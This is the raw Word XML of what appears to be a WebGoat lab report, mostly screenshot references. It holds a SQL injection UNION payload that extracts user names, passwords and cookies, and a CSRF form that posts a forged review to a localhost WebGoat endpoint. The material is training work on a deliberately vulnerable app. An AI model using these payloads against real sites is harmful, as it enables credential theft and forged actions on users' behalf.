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47094" w14:textId="5975CEDE" w:rsidR="00295E0D" w:rsidRPr="00C47820" w:rsidRDefault="00295E0D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C3E20A3" w14:textId="318B2397" w:rsidR="00A86529" w:rsidRDefault="006D041A">
      <w:r w:rsidRPr="00A86529">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41E1343E" wp14:editId="24CBF970">
            <wp:extent cx="5940425" cy="21374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5046" w14:textId="4FC5C335" w:rsidR="00A86529" w:rsidRDefault="00A3222F">
      <w:r w:rsidRPr="00A3222F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A891CE3" wp14:editId="5061B767">
            <wp:extent cx="5940425" cy="283019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AB75" w14:textId="77777777" w:rsidR="00A3222F" w:rsidRDefault="00A3222F"/>
    <w:p w14:paraId="57DAF436" w14:textId="4F372F49" w:rsidR="008A6E8C" w:rsidRDefault="00980C3D">
      <w:r w:rsidRPr="00980C3D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="660641FC" wp14:editId="5C8E79F7">
            <wp:extent cx="5940425" cy="35064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DDF4F" w14:textId="7C0CA0BA" w:rsidR="00A3222F" w:rsidRDefault="00A3222F"/>
    <w:p w14:paraId="0B7F0745" w14:textId="26A7C82A" w:rsidR="00A3222F" w:rsidRDefault="00A3222F">
      <w:r w:rsidRPr="00A3222F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DB58259" wp14:editId="204C355C">
            <wp:extent cx="5940425" cy="20688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C083" w14:textId="0D29791F" w:rsidR="00A3222F" w:rsidRDefault="00A3222F"/>
    <w:p w14:paraId="0B1848F2" w14:textId="382D4AE9" w:rsidR="00A3222F" w:rsidRDefault="00A3222F">
      <w:r w:rsidRPr="00A3222F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71C753F6" wp14:editId="1F46412F">
            <wp:extent cx="5940425" cy="37287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9A32" w14:textId="2DFF6EC9" w:rsidR="00C47820" w:rsidRDefault="00C47820">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47820">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>union select userid, user_name, password, cookie, null as n1, null as n2, null as n3 from user_system_data; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B49D0AA" w14:textId="20734D94" w:rsidR="00C47820" w:rsidRDefault="00C47820">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47820">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C7BF9AC" wp14:editId="0DE4E008">
            <wp:extent cx="5940425" cy="39497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E2DD" w14:textId="6001FA52" w:rsidR="00C47820" w:rsidRDefault="00C47820">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47820">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0789849F" wp14:editId="72D15F41">
            <wp:extent cx="5940425" cy="132016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D1267" w14:textId="0FE7C181" w:rsidR="00C57A2D" w:rsidRDefault="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F78F4B3" w14:textId="77777777" w:rsidR="00C57A2D" w:rsidRPr="00C57A2D" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E506998" w14:textId="77777777" w:rsidR="00C57A2D" w:rsidRPr="00C57A2D" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;form action="http://localhost:8080/WebGoat/csrf/review" method="post" enctype="application/x-www-form-urlencoded; charset=UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEFBBA5" w14:textId="77777777" w:rsidR="00C57A2D" w:rsidRPr="00C57A2D" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;input name = "reviewText" value="great" type="hidden"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE7118" w14:textId="77777777" w:rsidR="00C57A2D" w:rsidRPr="00C57A2D" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;input name = "stars" value="5" type="hidden"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C45A2DA" w14:textId="77777777" w:rsidR="00C57A2D" w:rsidRPr="00C57A2D" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;input name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9" type="hidden"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368545B6" w14:textId="77777777" w:rsidR="00C57A2D" w:rsidRPr="00C57A2D" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;input type="submit" value="Submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D019A8" w14:textId="77777777" w:rsidR="00C57A2D" w:rsidRPr="00C57A2D" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F71B4C" w14:textId="7EB03A3D" w:rsidR="00C57A2D" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B72953" w14:textId="12B9360A" w:rsidR="00C57A2D" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665ACBC9" w14:textId="4295EB21" w:rsidR="00C57A2D" w:rsidRPr="00C47820" w:rsidRDefault="00C57A2D" w:rsidP="00C57A2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C6A2D87" wp14:editId="60615408">
            <wp:extent cx="5575935" cy="9251950"/>
            <wp:effectExtent l="0" t="0" r="571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A2D" w:rsidRPr="00C4782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529"/>
    <w:rsid w:val="00295E0D"/>
    <w:rsid w:val="003703F4"/>
    <w:rsid w:val="006D041A"/>
    <w:rsid w:val="00743837"/>
    <w:rsid w:val="008A6E8C"/>
    <w:rsid w:val="00980C3D"/>
    <w:rsid w:val="00A3222F"/>
    <w:rsid w:val="00A86529"/>
    <w:rsid w:val="00C47820"/>
    <w:rsid w:val="00C57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FD3C82"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{644E0C5A-667D-49C5-919D-72414FB6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638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5</Pages>
  <Words>82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TwiLight -_-</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>TwiLight -_-</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-28T06:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-16T11:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>